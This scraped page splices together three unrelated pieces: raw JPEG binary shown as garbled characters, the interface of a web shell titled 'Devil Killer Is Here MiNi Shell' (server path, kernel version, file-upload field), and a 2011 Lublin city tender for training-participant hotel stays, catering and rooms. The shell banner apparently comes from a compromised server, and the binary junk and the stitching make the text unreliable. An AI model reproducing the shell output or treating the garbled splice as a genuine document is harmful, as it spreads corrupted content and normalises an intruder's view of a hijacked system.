JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111122/304877-N-2011.html

<p class="kh_header"><b>Lublin: zorganizowanie pobytu uczestników szkoleń (nocleg, wyżywienie, wynajem sal szkoleniowych) - VI części</b><br>
<b>Numer ogłoszenia: 304877 - 2011; data zamieszczenia: 22.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lublin , Pl. Łokietka 1, 20-950 Lublin, woj. lubelskie, tel. 081 4663000, faks 081 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie pobytu uczestników szkoleń (nocleg, wyżywienie, wynajem sal szkoleniowych) - VI części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje: Zorganizowanie pobytu uczestników 6 szkoleń         2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej                    w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 8 pokoi 2 osobowych, 14 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny                                 (z całodobowym dostępem do zimnej i ciepłej wody) i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (przewodowy lub wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 10.00 pierwszego dnia pobytu i trwa do godz.17.00 drugiego dnia pobytu.
1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.5.1.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników): 
- przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
- zupa (minimum dwie do wyboru)
- dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
- dodatki (ziemniaki, frytki, ryż, makaron)
- surówki (minimum trzy do wyboru)
- desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
herbata ( różnorodna- czarna, zielona, owocowa) woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) na bieżąco uzupełniania w godzinach od 19:30 do 24:00
danie na ciepło (3 do wyboru)
Bez ograniczeń ilościowych:
- sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
- przystawki (wybór zimnych przekąsek mięsnych i rybnych)
- wędliny (różnorodne, minimum 5 rodzai)
- sery (różnorodne- żółte, pleśniowe, białe) 
- warzywa (świeże i konserwowe)
- pieczywo (różnorodne- jasne, ciemne, bagietki)
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna- czarna, zielona, owocowa) woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.5.3.Śniadanie w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
- wędliny (różnorodne- minimum 5 rodzai)
- sery (różnorodne- żółte, pleśniowe, białe)
- dżemy
- jajka
- płatki śniadaniowe, muesli
- mleko (ciepłe i zimne)
- jogurty
- świeże owoce
- pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa) woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
- przystawki (wybór zimnych przekąsek mięsnych, rybnych)
- zupa (dwie do wyboru)
- dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
- dodatki (ziemniaki, frytki, ryż, makaron)
- surówki (minimum trzy do wyboru)
- desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte) herbata (różnorodna: czarna, zielona, owocowa) woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.6.Wykonawca zapewni dla każdego uczestnika szkolenia suchy prowiant na podróż obejmujący: kanapkę, owoc, ciasto/baton, sok w kartoniku, wodę mineralną.
1.7.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną-z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną- czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sal szkoleniowych.
1.8.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.9.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.10.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.11.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.12.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.13.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające będą polegały na zorganizowaniu pobytu uczestników (grupy 30 osobowe) szkoleń 2 dniowych obejmujących noclegi, całodzienne wyżywienie i wynajem sal szkoleniowych w obiekcie hotelarskim o standardzie minimum 3 gwiazdek, znajdującym się w odległości od 170 km do 220 km od granic Lublina.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunek udziału w postępowaniu zostaną ocenieni wykonawcy którzy wykażą dysponowanie narzędziami, wyposażeniem zakładu i urządzeniami technicznymi niezbędnymi do realizacji zamówienia tj. obiektem hotelarskim o standardzie minimum 3 gwiazdek, w odległości od 170 km do 220 km od centrum miasta Lublin tj. Bramy Krakowskiej jako punktu stanowiącego podstawę wskazań kilometrów na mapach.
UWAGA:
Zamawiający będzie weryfikował odległość w przedziale od 170 do 220 km wg wskazań map samochodowych. Droga, którą można dojechać do danego obiektu winna być drogą najszybszą.
Zamawiający zastrzega sobie prawo do wyjazdu sprawdzającego obiekty wskazane w wykazie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 2. Kalkulację ceny ofertowej 3. Oświadczenie o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom. 4. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 5. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub wykonawca - w przypadku osób fizycznych. 6. W sytuacji, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 7. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony przewidują są następujące rodzaje i warunki zmiany treści umowy:
1)zmiana terminu szkolenia i okresu obowiązywania umowy:
a)gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego;
b)działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie;
2)zmiana lokalizacji obiektu hotelarskiego 
a)gdy wskazany przez Wykonawcę obiekt nie spełnia wymogów określonych w umowie.
2.Zmiany umowy przewidziane w pkt. 1 dopuszczalne są na następujących warunkach:
1)ad pkt 1) -   zmiana terminu szkolenia i okresu obowiązywania umowy:
a)lit. a) - o okres umożliwiający osiągnięcie uzasadnionego interesu Zamawiającego,
b)lit. b) - o okres działania siły wyższej oraz potrzebny do usunięcia skutków tego działania,
2)ad pkt 2)  zmiana  lokalizacji obiektu hotelarskiego:
a)lit. a)  - na obiekt hotelarski o standardzie nie niższym niż określony w umowie, pod warunkiem, iż obiekt ten znajdować się będzie w odległości od 170 km do 220 km od centrum miasta Lublin tj. Bramy Krakowskiej oraz nie zwiększania wartości wynagrodzenia brutto.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych UM Lublin Plac Litewski 1 pokój nr 3 po dokonaniu wpłaty 5 zł w kasie UM Lublin ul. Wieniawska 14 lub za zaliczeniem pocztowym (5 zł + koszty przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2011 godzina 10:30, miejsce: Biuro Zamówień Publicznych UM Lublin Plac Litewski 1 pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Osobami upoważnionymi do kontaktowania się z wykonawcami są:
1.1 .W zakresie przedmiotu zamówienia: p. Dorota Menczewicz - Wydział Organizacji Urzędu Miasta Lublin, ul. Dolna 3-Maja 5, pok. 303, telefon (081) 466-12-88.
1.2.W zakresie procedury: p. Jolanta Bielska - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 3, telefon (081) 466-30-11.
2.Termin wykonania zamówienia:
2.1.Część I: 	12-13 stycznia 2012 r.
2.2.Część II:	26-27 stycznia 2012 r.
2.3.Część III:	2-3 lutego 2012 r.
2.4.Część IV:	9-10 lutego 2012 r.
2.5.Część V:	16-17 lutego 2012 r.
2.6.Część VI:	23-24 lutego 2012 r.
3. Zadanie finansowane jest z projektu NOVUS - program rozwoju administracji samorządowej Warszawy, Poznania, Lublina, Ełku i Łodzi w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zorganizowanie pobytu uczestników szkoleń (nocleg, wyżywienie, wynajem sal szkoleniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje: Zorganizowanie pobytu uczestników 6 szkoleń         2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej                   w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 8 pokoi 2 osobowych, 14 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny                                 (z całodobowym dostępem do zimnej i ciepłej wody) i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (przewodowy lub wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 10.00 pierwszego dnia pobytu i trwa do godz.17.00 drugiego dnia pobytu.
1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.5.1.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
-zupa (minimum dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata ( różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) na bieżąco uzupełniania w godzinach od 19:30 do 24:00
danie na ciepło (3 do wyboru)
Bez ograniczeń ilościowych:
-sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
-przystawki (wybór zimnych przekąsek mięsnych i rybnych)
-wędliny (różnorodne, minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe) 
-warzywa (świeże i konserwowe)
-pieczywo (różnorodne- jasne, ciemne, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.5.3.Śniadanie w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
-wędliny (różnorodne- minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe)
-dżemy
-jajka
-płatki śniadaniowe, muesli
-mleko (ciepłe i zimne)
-jogurty
-świeże owoce
-pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)herbata (różnorodna: czarna, zielona, owocowa)woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
-przystawki (wybór zimnych przekąsek mięsnych, rybnych)
-zupa (dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna: czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.6.Wykonawca zapewni dla każdego uczestnika szkolenia suchy prowiant na podróż obejmujący: kanapkę, owoc, ciasto/baton, sok w kartoniku, wodę mineralną.
1.7.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną-z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną- czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sal szkoleniowych.
